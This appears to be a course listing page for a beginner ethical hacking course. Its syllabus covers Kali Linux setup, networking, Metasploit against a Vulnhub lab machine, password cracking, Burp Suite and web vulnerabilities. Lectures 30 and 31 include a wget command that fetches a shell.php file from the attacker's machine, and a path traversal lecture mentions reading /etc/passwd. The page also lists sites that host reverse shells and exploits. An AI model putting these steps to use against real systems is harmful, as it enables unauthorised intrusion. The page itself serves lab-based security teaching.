Currently Empty: £0.00
Security Hacking | Ethical Hacking for Absolute Beginners. Learn Security Hacking like a Black Hat Hacker or a Professional Cybersecurity Expert!
Security Hacking | Ethical Hacking is a part of Legal Penetration Testing. It consists of Highly skilled Hackers, that test/look for vulnerabilities in Systems, Networks, Websites, Mobile Apps or Code itself.
Security is a very demanding job but very rewarding. Some penetration Testers get paid ÂŁ90,000/yr as a basic salary!
So I think we can easily assume that Ethical Hacking is a really really good career to check out!
Please note: that as said above, Security Hacking is very demanding and hard. You will have to put a lot of dedication, effort and suffering to get to the highest level. But I strongly believe in that “Everything is Possible”, that’s why this course is an absolute MUST when it comes to learning Hacking. I explain everything in detail to be understood as easy as possible.
Security Hacking & Ethical Hacking Complete Bundle Course for Absolute Beginners in Cybersecurity.
-
*The course is being constantly updated, You will miss out on crucial information if you don’t Enroll now!*
-
*Please note that this is pure knowledge from my personal experience and background. It’s up to the learners effort and understanding, of how well he/she will perform in the future.**
Learn Networking - Cisco Packet Tracer
-
1Installing VMware + Kali Linux (fastest way to install Kali)
By watching this quick tutorial, You will learn:
How to download & install VMWare
How to download & install Kali Linux (other systems can be installed the same way)
How to run a VM
How to log in to Kali Linux (credentials are kali:kali)
Link: https://www.kali.org/get-kali/#kali-virtual-machines
Link: https://www.vmware.com/uk/products/workstation-player/workstation-player-evaluation.html
-
2Vmware Settings and Increasing Security
IT'S IMPORTANT THAT YOU WATCH THIS LECTURE, TO NOT MAKE YOUR HOST COMPUTER VULNERABLE!
-
3Host and Guest systems
-
4About Virtual Machines
-
5Recommended Specs
-
6Resources
Network Traffic Analysation
-
7Downloading Cisco Packet Tracer
-
8Using Packet Tracer
-
9Networking #1
-
10Networking #2
-
11Topologies
-
12Ifconfig | Ipconfig /all
-
13Public vs Private IP Address
To recap:
Your Public IP Address is something that identifies your home network. And is given by Your ISP (Internet Service Provider). We can change our Public IP Address by using a VPN or Tor or other alternatives.
Your Private IP Address is something that identifies your device within a LAN (Local Area Network). This can be easily changed but causes no effect from outside of Your LAN. This IP is useful when configuring, accessing devices. Like connecting remotely through SSH to our server.
-
14Assigning IP Address (IPv4) Linux
-
15Assigning IP Address (IPv4) Windows
How to use and navigate around Kali Linux System.
Wordlists
-
17Getting to know Kali.
Learn to use:
Basic Linux commands
Learning to read contents of files
Writing to files
Making directories
Removing directories and files
Man and Help pages
-
18Learning Kali Linux From A - Z (1 Hour Long Video)
This is a full Kali Linux from A to Z.
I will teach You everything you need to navigate around Kali.
How to use Kali
Using Your first tool
Changing your default password (recommended)
Changing other users password
Opening up your Python3 Web Server
Much much more, Here are the timestamps!
TIMESTAMPS: 00:00 - Intro
03:59 - Installing Kali + VMWare
04:30 - UI Walkthrough
09:11 - Linux System Files
10:42 - Changing user pass
13:06 - Hacking Tools Showcase
20:00 - Learning Command Line
26:17 - Updating Kali
28:54 - Checking Our O/S Release
31:26 - Back To Command Line
38:09 - Wordlists showcase
39:50 - Opening up folders through CLI
40:28 - System & Useful Commands
45:20 - Text Editing (Nano)
56:18 - Linux Permissions
1:03:12 - Kali IP Addressing
1:04:51 - Using Our First Hacking Tool
1:05:14 - Using Help Menus
1:06:24 Using Nmap continued
1:10:25 - Installing Any Program/Tool on Linux
1:12:67 - Different Wordlists for different purposes
1:16:20 - Finding Any Files on Linux
-
19Quick Switching
-
20Avoiding using SUDO or ROOT for everything.
-
21Linux Permissions
Hacking Linux - From Recon to Privilage Escalation
Hacking Windows - From Recon to Privilage Escalation
-
25Installing a Victim Ubuntu Linux Machine - Vulnhub
Link To Download Victim (RHOST) Machine
https://www.vulnhub.com/entry/basic-pentesting-1,216/
-
26Recon - Nmap
-
27Recon - Finding an exploit/vulnerability
-
28MSFConsole - Setting up
-
29MSFConsole - Exploitation
-
30Transferring Files with Python3. Victim To Kali
Remember that this works both ways. On Kali we can browse files through the browser (unless we have RDP - Remote Desktop Protocol on the victim then we can use the browser too)
Shell Command: wget LHOST_IP:PORT/filename.extension
Shell Example: wget 192.168.88.130:8000/shell.php
-
31Transferring Files with Python3. Kali To Victim
Remember that this works both ways. On Kali we can browse files through the browser (unless we have RDP - Remote Desktop Protocol on the victim then we can use the browser too)
Shell Command: wget LHOST_IP:PORT/filename.extension
Shell Example: wget 192.168.88.130:8000/shell.php
-
32Cracking User Passwords
-
33Creating Users
https://www.freecodecamp.org/news/linux-how-to-add-users-and-create-users-with-useradd/
Reverse Shells By Files
Hydra - Brute Forcing
Anonymization
Hacking Wordpress
-
43Proxychains
https://www.dnsleaktest.com/
-
44Tor Browser
Please note that YOU SHOULD be using a VM to access the darkweb, to protect your Host Computer. Because we are running a safety & privacy browser doesn't mean we are 100% safe.
(100% safe doesn't exist in Technology)
-Also avoid logging into bank accounts
-Never share your details
-As the Developers recommend, don't mix VPN with Tor.
-Don't access the website you aren't supposed to. Any Explicit Illegal Websites.
-Do not buy anything, you are 99% likely to get scammed or robbed.
-Don't share any sensitive data, credentials or bank account details!
Other than that, have fun! :)
Directory Busting
Common Exploits / Misconfigurations
Hashcat - a Password Cracking/Hash tool.
Burpsuite Tutorials
Website Exploitation
-
56What is Burpsuite?
Burpsuite is a Website Proxy that allows us to intercept traffic/website requests which then we can modify.
We shouldn't underestimate the power of Burpsuite as it can be very, very powerful. Especially if someone knows how capable this tool is.
Some of the key features that Burp can do:
Bypass Filters
Bypass Firewalls
Modify values we send
Local File Inclusion & Remote File Inclusion
RCE + Reverse Shells
Send unexpected files (for example an .php5 file to a profile picture upload)
And much much more, possiblities are endless!
-
57Setting up Burpsuite - CA Certificate and Proxy
If for whatever reason, you don't have burp suite installed. Follow commands below!
RUN THESE COMMANDS!:
sudo apt-get update
sudo apt-get upgrade
sudo apt install burpsuite
-
58Intercepting Requests (Proxy)
**IMPORTANT TO SAVE YOURSELF SANITY**
-To intercept requests you need to turn on Web Extension Proxy + Intercept ON
-To disable, intercepting but still wanting to use Burpsuite, just turn off Intercepting
-To completely turn off Burpsuite, turn off Burp + Disable Web Proxy!!
-
59Using Repeater
-
60Using Intruder (Example of Brute Force)
-
61Example of UserID Parameter Vulnerability
-
62Why Burpsuite is very useful
Programming - Python (python.py)
-
63Introduction - Read!
-
64Extensions To Install
-
65Introduction To Web Hacking & Dev Tools are powerful!
-
66Important Websites For Hacking
From my personal experience, these websites will make your life easier and are CRUCIAL for Hacking.
revshells.com = For Reverse Shells and Payloads
exploit-db.com = Database of Payloads/Exploits
geeksforgeeks.org = Payloads, Information and Resources
dnsleaktest.com = Testing for DNS leaks, checking for VPN/Tor connection (if it works)
w3schools.com = Great website for learning anything. SQL, Python, Javascript, HTML.
shodan.io = Scroll down for more about Shodan
osintframework.com = Scroll down for more about OSINT
book.hacktricks.xyz = Hacking Resources, Payloads, Elite Hacking Web
hackingarticles.in = Hacking Resources & Knowledge
hackers-arise.com = Elite Hacking Web
Post Exploitation Webs:
https://gtfobins.github.io/ = Used in Linux Post Exploitation for privilege escalation
https://lolbas-project.github.io/ = Used in Windows Post Exploitation for privilege escalation
Obviously, you don't need to sit on these websites 24/7. Check them out and choose your favourites.
You can always come back to this section and go through them, Im giving you my personal favourites and best websites that I have been using for years.
-
67OWASP - Important Website.
-
68Example of Website Hacking
-
69Path Traversal Example - Simple Case
Path Traversal vulnerability (also known as LFI - Local File Inclusion) allows you to look through directories/files of the server that the website is hosted.
For example, by displaying images we may be able to go back in directories to view the etc/passwd file which contains a list of users
-
70Upload Vulnerabilities #1
-
71Open Redirect and Reverse Hashing
Web Scripting - Javascript (index.js)
How long do I have access to the course materials?
You can view and review the lecture materials indefinitely, like an on-demand channel.
Can I take my courses with me wherever I go?
Definitely! If you have an internet connection, courses on Udemy are available on any device at any time. If you don't have an internet connection, some instructors also let their students download course lectures. That's up to the instructor though, so make sure you get on their good side!
Stars 5
1
Stars 4
1
Stars 3
0
Stars 2
0
Stars 1
0